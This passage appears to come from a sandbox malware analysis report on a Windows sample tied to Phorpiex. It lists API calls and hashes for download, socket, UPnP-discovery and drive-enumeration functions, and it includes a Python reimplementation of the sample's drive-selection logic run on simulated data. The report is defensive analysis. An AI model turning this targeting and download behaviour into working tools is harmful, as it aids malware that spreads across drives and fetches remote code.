  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
Memory Dump Source
• Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
Yara matches
Similarity
• API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
• String ID:
• API String ID: 3966618661-0
• Opcode ID: 465430f324d41f9d9d9732ee1befa355f4717a0d242bba6110d7f62502904e98
• Instruction ID: 9f2c4cc69d55b471d510ac50d158e14e0eacb849a4393371b11790265c13a883
• Opcode Fuzzy Hash: 465430f324d41f9d9d9732ee1befa355f4717a0d242bba6110d7f62502904e98
• Instruction Fuzzy Hash: 5841D175604B02ABC714DB38D848797F3A4BF84310F18823EE86D933D1E739A855CB99
APIs
• CreateFileW.KERNEL32(0041AC50,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B0C8
• WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B0E9
• FlushFileBuffers.KERNEL32(000000FF), ref: 0040B0F3
• CloseHandle.KERNEL32(000000FF), ref: 0040B0FD
• InterlockedExchange.KERNEL32(00419828,0000003D), ref: 0040B10A
Memory Dump Source
• Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
Yara matches
Similarity
• API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
• String ID:
• API String ID: 442028454-0
• Opcode ID: 5693974f53a6f553ee872c1498f347a7cdbd554753dda3213ec7bc77a9e739f7
• Instruction ID: 65abf3b26d1f33ce57344cf3d4c90c2ddc2d392c326f45743aae56010b0155a0
• Opcode Fuzzy Hash: 5693974f53a6f553ee872c1498f347a7cdbd554753dda3213ec7bc77a9e739f7
• Instruction Fuzzy Hash: D33149B8A40208EBCB14DF94EC45FAEB7B1FB48300F208569E511A7391D775AA51CB9A
APIs
Memory Dump Source
• Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
Yara matches
Similarity
• API ID: _allshl
• String ID:
• API String ID: 435966717-0
• Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
• Instruction ID: b0d0b2528f3aca05c18ea064ccca22ed782aa92eb9f3aacb3aeadda2a23aac7b
• Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
• Instruction Fuzzy Hash: 92F01272A01414979B14EEFE84424CAF7E59F88374B218176FD1CE3260E570B90546F1
APIs
• SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
• WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
• CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
  • Part of subcall function 0040A660: HeapFree.KERNEL32(00000000,00000000,00402612,?,00402612,?), ref: 0040A6BB
Strings
Memory Dump Source
• Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
Yara matches
Similarity
• API ID: CloseEventFreeHandleHeapObjectSingleWait
• String ID: pdu
• API String ID: 309973729-2320407122
• Opcode ID: 2fd66f5c1125709e912b082e2c73e8d5efb2a89a668c62a8ecc72b7ea0d0f82b
• Instruction ID: 49315f9b5d193dc364c5f28f0bcb7aa8bb44b0403a6660fc991bd28791f727bd
• Opcode Fuzzy Hash: 2fd66f5c1125709e912b082e2c73e8d5efb2a89a668c62a8ecc72b7ea0d0f82b
• Instruction Fuzzy Hash: A901D6B65003009BCB209F61ECC4D9B7778AF48310708467AFC05AB396CA39E8508775
APIs
• GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
• QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
• StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
Strings
Memory Dump Source
• Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
Yara matches
Similarity
• API ID: DeviceDriveQueryType
• String ID: \??\
• API String ID: 1681518211-3047946824
• Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
• Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
• Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
• Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
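The two drive-walking functions listed above (GetLogicalDrives followed by the HKLM Policies\Explorer\NoDrives lookup at 00406346-004063DE, and GetDriveTypeW / QueryDosDeviceW / StrCmpNW against "\??\" at 004062CD-00406324) together describe how the sample decides which drive letters to visit. The following is an added example, not code from the sample, from Phorpiex, or from Joe Sandbox: it reimplements that selection logic in Python on constructed input so the bitmask and prefix checks can be read and tested offline. The Windows calls are simulated by a dictionary; the decisions on what happens when a drive is hidden by NoDrives, when its device path starts with "\??\" (a SUBST or DefineDosDevice alias rather than a real volume), and which GetDriveTypeW classes count are assumptions, since the report only shows the calls and not the branch taken.

```python
"""Drive selection as implied by the GetLogicalDrives/NoDrives and
GetDriveTypeW/QueryDosDeviceW/StrCmpNW listings. Added example; not the
sample's code. Windows API results are simulated by constructed input."""
from __future__ import annotations

from dataclasses import dataclass
from typing import Dict, FrozenSet, List

# GetDriveTypeW return values (winbase.h)
DRIVE_UNKNOWN, DRIVE_NO_ROOT_DIR, DRIVE_REMOVABLE, DRIVE_FIXED = 0, 1, 2, 3
DRIVE_REMOTE, DRIVE_CDROM, DRIVE_RAMDISK = 4, 5, 6

# Key/value the sample opens under HKEY_LOCAL_MACHINE (hive 80000002)
NODRIVES_KEY = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
NODRIVES_VALUE = "NoDrives"

# Assumption: only these GetDriveTypeW classes are worth visiting.
DEFAULT_WANTED: FrozenSet[int] = frozenset({DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_REMOTE})
ALL_LETTERS_MASK = (1 << 26) - 1


def letters_from_mask(mask: int) -> List[str]:
    """GetLogicalDrives and NoDrives share one layout: bit n set => chr('A'+n)."""
    return [chr(ord("A") + bit) for bit in range(26) if mask & (1 << bit)]


def mask_from_letters(letters: str) -> int:
    """Inverse of letters_from_mask; used here to build constructed input."""
    mask = 0
    for ch in letters.upper():
        mask |= 1 << (ord(ch) - ord("A"))
    return mask


def nodrives_from_reg_bytes(raw: bytes | None) -> int:
    """RegQueryValueExW was called with a 4-byte buffer, i.e. a REG_DWORD.
    None models the query failing (value absent): nothing is hidden."""
    if raw is None:
        return 0
    if len(raw) != 4:
        raise ValueError("NoDrives must be a 4-byte REG_DWORD")
    return int.from_bytes(raw, "little")


def is_dos_device_alias(device_path: str) -> bool:
    """StrCmpNW(path, L"\\??\\", 4) == 0: QueryDosDeviceW returned an alias
    such as a SUBST mapping, not a \\Device\\... volume."""
    return device_path[:4] == "\\??\\"


@dataclass(frozen=True)
class DriveInfo:
    drive_type: int    # simulated GetDriveTypeW("X:\\") result
    device_path: str   # simulated QueryDosDeviceW("X:") result


def candidate_drives(logical_mask: int, nodrives_raw: bytes | None,
                     drives: Dict[str, DriveInfo],
                     wanted: FrozenSet[int] = DEFAULT_WANTED) -> List[str]:
    """Drive letters that are present, not hidden by the NoDrives policy,
    of a wanted type, and backed by a real volume rather than an alias."""
    visible = logical_mask & ~nodrives_from_reg_bytes(nodrives_raw) & ALL_LETTERS_MASK
    chosen: List[str] = []
    for letter in letters_from_mask(visible):
        info = drives.get(letter)
        if info is None or info.drive_type not in wanted:
            continue
        if is_dos_device_alias(info.device_path):   # assumption: aliases skipped
            continue
        chosen.append(letter)
    return chosen


# Constructed inventory standing in for the live API results.
SAMPLE_LOGICAL = mask_from_letters("CDEFZ")
SAMPLE_NODRIVES = (1 << 5).to_bytes(4, "little")     # policy hides F:
SAMPLE_DRIVES: Dict[str, DriveInfo] = {
    "C": DriveInfo(DRIVE_FIXED, "\\Device\\HarddiskVolume3"),
    "D": DriveInfo(DRIVE_CDROM, "\\Device\\CdRom0"),
    "E": DriveInfo(DRIVE_REMOVABLE, "\\Device\\HarddiskVolume7"),
    "F": DriveInfo(DRIVE_REMOVABLE, "\\Device\\HarddiskVolume8"),
    "Z": DriveInfo(DRIVE_FIXED, "\\??\\C:\\Users\\Public\\share"),  # SUBST alias
}

if __name__ == "__main__":
    print("present :", letters_from_mask(SAMPLE_LOGICAL))
    print("hidden  :", letters_from_mask(nodrives_from_reg_bytes(SAMPLE_NODRIVES)))
    print("chosen  :", candidate_drives(SAMPLE_LOGICAL, SAMPLE_NODRIVES, SAMPLE_DRIVES))
```

On the constructed inventory D: drops out as a CD-ROM, F: because the NoDrives policy hides it, and Z: because QueryDosDeviceW would report a "\??\" alias, leaving C: and E:. For a live check of the same policy value on a host, the analyst equivalent is reading the NoDrives DWORD under that Explorer key and decoding it with the same bit layout.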
APIs
• ioctlsocket.WS2_32 ref: 0040112B
• recvfrom.WS2_32 ref: 0040119C
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
• WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
Memory Dump Source
• Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
• String ID:
• API String ID: 3980219359-0
• Opcode ID: ab8b34524f24c7ff0ec759a8db121372cfa49b223874d41307e8bdf502b19990
• Instruction ID: dd229b18b8e608a96638b9a50d19e2d27eaf393d2ffc9a5ffa46aac6cea4a516
• Opcode Fuzzy Hash: ab8b34524f24c7ff0ec759a8db121372cfa49b223874d41307e8bdf502b19990
• Instruction Fuzzy Hash: 7C21C3B1504301AFD304DF65DC84A6BB7E9EF88318F004A3EF555A6290E774D9588BEA
                                                                                APIs
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                 Joe Sandbox IDA Plugin
                                                                                 • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                • String ID:
                                                                                • API String ID: 2074799992-0
                                                                                • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                                                                • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                                                                APIs
                                                                                • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                                                                • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                                                                • Sleep.KERNEL32(000003E8), ref: 00407361
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                 Joe Sandbox IDA Plugin
                                                                                 • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                • API ID: CacheDeleteEntry$Sleep
                                                                                • String ID:
                                                                                • API String ID: 672405725-0
                                                                                • Opcode ID: 0889daea8db3d00c114acb4ae5d662601a50873d8cf4ae377a86a09432f2b769
                                                                                • Instruction ID: e789c4acaeed7b47b7c3c4d69342d3bd95a049e3571e2ded942ca122a7fff21c
                                                                                • Opcode Fuzzy Hash: 0889daea8db3d00c114acb4ae5d662601a50873d8cf4ae377a86a09432f2b769
                                                                                • Instruction Fuzzy Hash: A5218175E04208FBDB04DFA4D885B9E7B74AF44309F10C4A9ED416B391D679AB80DB49
                                                                                APIs
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                 Joe Sandbox IDA Plugin
                                                                                 • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                • API ID: Recv$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 3668019968-0
                                                                                • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                                • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                                                                • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                                • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                                                                APIs
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                 Joe Sandbox IDA Plugin
                                                                                 • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                • API ID: Send$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 2121970615-0
                                                                                • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                                                                • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0040D8D9
                                                                                • CloseHandle.KERNEL32(?), ref: 0040D908
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D917
                                                                                • DeleteCriticalSection.KERNEL32(?), ref: 0040D924
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                 Joe Sandbox IDA Plugin
                                                                                 • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                • String ID:
                                                                                • API String ID: 3102160386-0
                                                                                • Opcode ID: 52aae5ad70f9b3043191c8c3e05b1acc6f9f728bea5bc6a869e37892dc5a7148
                                                                                • Instruction ID: 6abb592c5b2ce8a5c046663d5def4690e4bb0a573cdaefcdc4ae98697e0ceaa0
                                                                                • Opcode Fuzzy Hash: 52aae5ad70f9b3043191c8c3e05b1acc6f9f728bea5bc6a869e37892dc5a7148
                                                                                • Instruction Fuzzy Hash: 4E1161B4D00208EBDB08DF94D984A9DB775FF44309F1485A9E806A7341C739EF94DB85
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                 Joe Sandbox IDA Plugin
                                                                                 • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2223660684-0
                                                                                • Opcode ID: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction ID: 487697b266744d2b5c3d358b1528705abebcded3db4b06867e0c0ac6ea0c4339
                                                                                • Opcode Fuzzy Hash: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction Fuzzy Hash: 4A01F7792423049FC3209F26ED84A9B73F8AF45711F04443EE44693650DB39E401CB28
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,00407ECD), ref: 00406F78
                                                                                • SysAllocString.OLEAUT32(0041AA40), ref: 00406F83
                                                                                • CoUninitialize.OLE32 ref: 00406FA8
                                                                                  • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                 Joe Sandbox IDA Plugin
                                                                                 • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                • API ID: String$Free$AllocInitializeUninitialize
                                                                                • String ID:
                                                                                • API String ID: 459949847-0
                                                                                • Opcode ID: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction ID: c509d36c12d7ba2a5f650eb278e956dc9bc0801d495f3ab7a1e1adcf34b7a620
                                                                                • Opcode Fuzzy Hash: aac59f4c634c6c7e69739dc525912ddcdb212d49f49b460d16b2d8434ec6ae87
                                                                                • Instruction Fuzzy Hash: 57E0DFB4941308FBCB00EBE0EE0EB8D7738EB04315F004078F90267291DABA9E90CB19
                                                                                APIs
                                                                                  • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                 Joe Sandbox IDA Plugin
                                                                                 • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                • API ID: CreateFreeInstanceString
                                                                                • String ID: Microsoft Corporation
                                                                                • API String ID: 586785272-3838278685
                                                                                • Opcode ID: 0f33dd4f09808e29644e00a9613dd62e49f7ac0aadddbd45ce77e6b9e4c1ac58
                                                                                • Instruction ID: 3bd6e37ccb81fb26e20ba6f4aecac2bab56e95e75b440682a2c5ba52433a4c42
                                                                                • Opcode Fuzzy Hash: 0f33dd4f09808e29644e00a9613dd62e49f7ac0aadddbd45ce77e6b9e4c1ac58
                                                                                • Instruction Fuzzy Hash: 2D91EC75A0410ADFCB04DF94C894AAFB7B5BF49304F208169E515BB3E0D734AD41CBA6
                                                                                APIs
                                                                                  • Part of subcall function 0040E070: memset.NTDLL ref: 0040E098
                                                                                  • Part of subcall function 0040E070: InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                  • Part of subcall function 0040E070: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                  • Part of subcall function 0040E070: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                  • Part of subcall function 0040E070: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                  • Part of subcall function 0040E070: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                  • Part of subcall function 0040E070: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                  • Part of subcall function 0040E070: InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                  • Part of subcall function 0040DF60: SysAllocString.OLEAUT32(00000000), ref: 0040DF8E
                                                                                  • Part of subcall function 0040DF60: CoCreateInstance.OLE32(004128F0,00000000,00004401,004128E0,00000000), ref: 0040DFB6
                                                                                  • Part of subcall function 0040DF60: SysFreeString.OLEAUT32(00000000), ref: 0040E051
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                 Joe Sandbox IDA Plugin
                                                                                 • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                • String ID: %S%S
                                                                                • API String ID: 1017111014-3267608656
                                                                                • Opcode ID: a146118a585c525953cbf50a01d03d7454997d8c312527b14433dc9a100378f5
                                                                                • Instruction ID: c1d615742e0f1fe272601d31d467041fc69409a08f8fe5a36c80dfd154d40f90
                                                                                • Opcode Fuzzy Hash: a146118a585c525953cbf50a01d03d7454997d8c312527b14433dc9a100378f5
                                                                                • Instruction Fuzzy Hash: 5F414BB5E0020A9FCB04DFE4C885AEFB7B9BF48304F148569E505B7390D738AA45CBA5
                                                                                APIs
                                                                                • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407EC8), ref: 0040DAFA
                                                                                  • Part of subcall function 0040DBC0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                  • Part of subcall function 0040DBC0: htons.WS2_32(0000076C), ref: 0040DC10
                                                                                  • Part of subcall function 0040DBC0: inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                  • Part of subcall function 0040DBC0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040DBC0: bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                  • Part of subcall function 0040DBC0: lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                  • Part of subcall function 0040DBC0: sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                  • Part of subcall function 0040DBC0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1579577467.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000005.00000002.1579557365.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                 • Associated: 00000005.00000002.1579607717.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                 Joe Sandbox IDA Plugin
                                                                                 • Snapshot File: hcaresult_5_2_400000_3193211493.jbxd
                                                                                • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                • String ID: TCP$UDP
                                                                                • API String ID: 1519345861-1097902612
                                                                                • Opcode ID: f2a508b97fbae45076dd5aa5ad3ba9adeb76e4e7dff97a5c25cb73082fa5fcae
                                                                                • Instruction ID: 6b43ad666573891978052671c2ef92d80966ae61c726f1f98895f42c7cfd0708
